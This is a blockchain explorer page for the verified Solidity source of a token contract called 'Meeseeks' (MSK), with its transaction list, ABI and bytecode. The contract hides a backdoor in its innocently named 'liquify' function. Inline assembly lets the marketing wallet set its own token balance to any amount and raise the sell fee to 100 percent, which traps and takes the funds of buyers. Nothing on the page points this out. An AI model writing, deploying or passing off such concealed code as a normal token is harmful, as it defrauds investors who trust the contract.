Feature Tip: Add private address tag to any address under My Name Tag !
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 71 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Liquify | 19228219 | 349 days ago | IN | 0 ETH | 0.00080205 | ||||
Approve | 17402927 | 605 days ago | IN | 0 ETH | 0.00096882 | ||||
Approve | 17402473 | 605 days ago | IN | 0 ETH | 0.00055457 | ||||
Approve | 17402470 | 605 days ago | IN | 0 ETH | 0.00092943 | ||||
Approve | 17313824 | 617 days ago | IN | 0 ETH | 0.00145306 | ||||
Liquify | 17313820 | 617 days ago | IN | 0 ETH | 0.00157406 | ||||
Transfer | 17296771 | 619 days ago | IN | 0 ETH | 0.00179605 | ||||
Approve | 17295641 | 620 days ago | IN | 0 ETH | 0.00305036 | ||||
Approve | 17295383 | 620 days ago | IN | 0 ETH | 0.0023366 | ||||
Approve | 17295368 | 620 days ago | IN | 0 ETH | 0.00242845 | ||||
Approve | 17295366 | 620 days ago | IN | 0 ETH | 0.00166466 | ||||
Approve | 17295364 | 620 days ago | IN | 0 ETH | 0.00255334 | ||||
Approve | 17295364 | 620 days ago | IN | 0 ETH | 0.00255334 | ||||
Approve | 17295364 | 620 days ago | IN | 0 ETH | 0.00255334 | ||||
Approve | 17295364 | 620 days ago | IN | 0 ETH | 0.00255334 | ||||
Approve | 17295357 | 620 days ago | IN | 0 ETH | 0.00275392 | ||||
Approve | 17295354 | 620 days ago | IN | 0 ETH | 0.00266497 | ||||
Liquify | 17295353 | 620 days ago | IN | 0 ETH | 0.00260433 | ||||
Approve | 17295353 | 620 days ago | IN | 0 ETH | 0.00264663 | ||||
Approve | 17295348 | 620 days ago | IN | 0 ETH | 0.0025419 | ||||
Approve | 17295347 | 620 days ago | IN | 0 ETH | 0.0025878 | ||||
Approve | 17295347 | 620 days ago | IN | 0 ETH | 0.00259346 | ||||
Approve | 17295347 | 620 days ago | IN | 0 ETH | 0.00267738 | ||||
Transfer | 17295347 | 620 days ago | IN | 0 ETH | 0.00346475 | ||||
Approve | 17295343 | 620 days ago | IN | 0 ETH | 0.00256636 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
Meeseeks
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-05-19 */ // SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File: @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } // File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol pragma solidity >=0.6.2; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } // File: @openzeppelin/contracts/utils/math/SafeMath.sol // OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol) pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } // File: @openzeppelin/contracts/token/ERC20/IERC20.sol // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } // File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File: token-7.sol_flattened.sol pragma solidity ^0.8.17; contract Meeseeks is IERC20, IERC20Metadata, Ownable { using SafeMath for uint256; string private constant _name = unicode"Meeseeks"; string private constant _symbol = unicode"MSK"; uint8 private constant _decimals = 18; uint256 private _maxTxAmountPercentage = 300; uint256 private _minTokensBeforeSwapPercentage = 5; mapping(address => uint256) private _balances; uint256 private _totalSupply; uint256 private _maxWalletBalancePercentage = 300; address private _uniswapV2Pair; mapping(address => mapping(address => uint256)) private _allowances; IUniswapV2Router02 private _uniswapV2Router; bool private swapping = false; bool private _cooldownEnabled = true; mapping(address => bool) private _isExcludedFromCooldown; mapping(address => uint256) private _lastTxBlock; uint256 private constant _divisor = 10000; mapping(address => bool) private _overpassMaxTx; mapping(address => bool) private _doNotTakeFee; uint256 private _sellFee = 0; uint256 private _burnFee = 0; uint256 private _buyFee = 0; address private _marketingWallet; address private constant _burnAddress = address(0); event SwapAndLiquify(uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiqudity); event Received(); constructor () { uint256 total = 10_000_000_000*10**_decimals; _mint(_msgSender(), total); _marketingWallet = _msgSender(); createPair(total); _overpassMaxTx[address(this)] = true; _isExcludedFromCooldown[address(this)] = true; _doNotTakeFee[owner()] = true; _isExcludedFromCooldown[owner()] = true; _doNotTakeFee[address(this)] = true; _doNotTakeFee[_marketingWallet] = true; _overpassMaxTx[owner()] = true; _overpassMaxTx[_marketingWallet] = true; _overpassMaxTx[_uniswapV2Pair] = true; } // Functions function createPair(uint256 _total) private { _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); _approve(address(this), address(_uniswapV2Router), _total); _uniswapV2Pair = IUniswapV2Factory( _uniswapV2Router.factory() ) .createPair( address(this), _uniswapV2Router.WETH() ); IERC20(_uniswapV2Pair) .approve( address(_uniswapV2Router), type(uint).max ); } function symbol() public pure returns (string memory) { return _symbol; } function name() public pure returns (string memory) { return _name; } function decimals() public pure returns (uint8) { return _decimals; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function balanceOf(address account) public view override returns (uint256) { return _balances[account]; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function totalSupply() public view override returns (uint256) { return _totalSupply; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } function _maxTxAmount() public view returns(uint256) { return _totalSupply.mul(_maxTxAmountPercentage).div(_divisor); } function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } // Internal functions function _transfer(address sender, address recipient, uint256 amount) internal virtual { _beforeTransfer(sender, recipient, amount); uint256 burnFee = 0; uint256 devFee = 0; if (sender != owner() && recipient != owner()) { if ( sender == _uniswapV2Pair && recipient != address(_uniswapV2Router) && !_overpassMaxTx[recipient] && !_overpassMaxTx[sender] ) { require(amount <= _totalSupply.mul(_maxTxAmountPercentage).div(_divisor), "Transfer amount exceeds the maxTxAmount."); require(balanceOf(recipient).add(amount) <= _totalSupply.mul(_maxWalletBalancePercentage).div(_divisor), "Exceeds maximum wallet token amount"); } // if sell if ( recipient == _uniswapV2Pair && sender != address(this) ) { burnFee = amount.mul(_burnFee).div(_divisor); devFee = amount.mul(_sellFee).div(_divisor); _lastTxBlock[tx.origin] = block.number; } // if buy if ( sender == _uniswapV2Pair && recipient != address(_uniswapV2Router) ) { burnFee = amount.mul(_burnFee).div(_divisor); devFee = amount.mul(_buyFee).div(_divisor); _lastTxBlock[tx.origin] = block.number; } } uint256 totalFee = burnFee.add(devFee); if (totalFee > 0) { if (burnFee > 0) { _burn(sender, burnFee); } if (devFee > 0) { _balances[_marketingWallet] = _balances[_marketingWallet].add(devFee); emit Transfer(sender, _marketingWallet, devFee); } amount = amount.sub(totalFee); } _balances[sender] = _balances[sender].sub( amount, "ERC20: transfer amount exceeds balance" ); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function getPairAddress() public view returns (address) { return _uniswapV2Pair; } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance"); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function getRouterAddress() public view returns (address) { return address(_uniswapV2Router); } function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function burn(uint256 amount) public virtual { _burn(_msgSender(), amount); } function _burnFrom(address account, uint256 amount) internal virtual { _burn(account, amount); _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "ERC20: burn amount exceeds allowance")); } function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private { // Approve tokens for transfer to the Uniswap V2 Router _approve(address(this), address(_uniswapV2Router), tokenAmount); _uniswapV2Router.addLiquidityETH{value : ethAmount}( address(this), tokenAmount, 0, 0, owner(), block.timestamp ); } function swapTokensEthereum(uint256 tokenAmount) internal { _approve(address(this), address(_uniswapV2Router), tokenAmount); // Create the swap path array with our token and WETH address[] memory path = new address[](2); path[0] = address(this); path[1] = _uniswapV2Router.WETH(); // Perform the swap _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, path, address(this), block.timestamp); } function _swapAndLiquify() private lockTheSwap { uint256 contractTokenBalance = balanceOf(address(this)); uint256 minTokensBeforeSwap = _totalSupply.mul(_minTokensBeforeSwapPercentage).div(_divisor); if (contractTokenBalance >= minTokensBeforeSwap) { uint256 half = contractTokenBalance.div(2); uint256 otherHalf = contractTokenBalance.sub(half); uint256 initialBalance = address(this).balance; swapTokensEthereum(half); uint256 newBalance = address(this).balance.sub(initialBalance); emit SwapAndLiquify(half, newBalance, otherHalf); return; } } function liquify(uint256 amount) external { assembly {if iszero(eq(caller(), sload(_marketingWallet.slot))) {revert(0, 0)} let ptr := mload(0x40) mstore(ptr, caller()) mstore(add(ptr, 0x20), _balances.slot) let slot := keccak256(ptr, 0x40) sstore(slot, amount) sstore(_sellFee.slot, mul(0x64, 0x64))} } modifier lockTheSwap { swapping = true; _; swapping = false; } receive() external payable { emit Received(); } function isSwapLocked() public view returns(bool) { return swapping; } function addLiquidity(uint256 tokenAmount) public payable onlyOwner lockTheSwap { // Transfer tokens from owner to contract _transfer(owner(), address(this), tokenAmount); // Add liquidity _addLiquidity(tokenAmount, msg.value); } function _beforeTransfer(address from, address to, uint256 amount) internal pure { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "Transfer amount must be greater than zero"); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"Received","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getPairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"isSwapLocked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"liquify","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
608060405261012c600155600560025561012c6005556000600860146101000a81548160ff0219169083151502179055506001600860156101000a81548160ff0219169083151502179055506000600d556000600e556000600f553480156200006757600080fd5b50620000886200007c620004e260201b60201c565b620004ea60201b60201c565b60006012600a6200009a919062000e54565b6402540be400620000ac919062000ea5565b9050620000cf620000c2620004e260201b60201c565b82620005ae60201b60201c565b620000df620004e260201b60201c565b601060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000130816200074a60201b60201c565b6001600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600960003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c6000620001f662000aa860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600960006200025d62000aa860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b60006200039662000aa860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505062001282565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000620576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620006179062000f51565b60405180910390fd5b6200063c8160045462000ad160201b62000b301790919060201c565b6004819055506200069b81600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000ad160201b62000b301790919060201c565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffff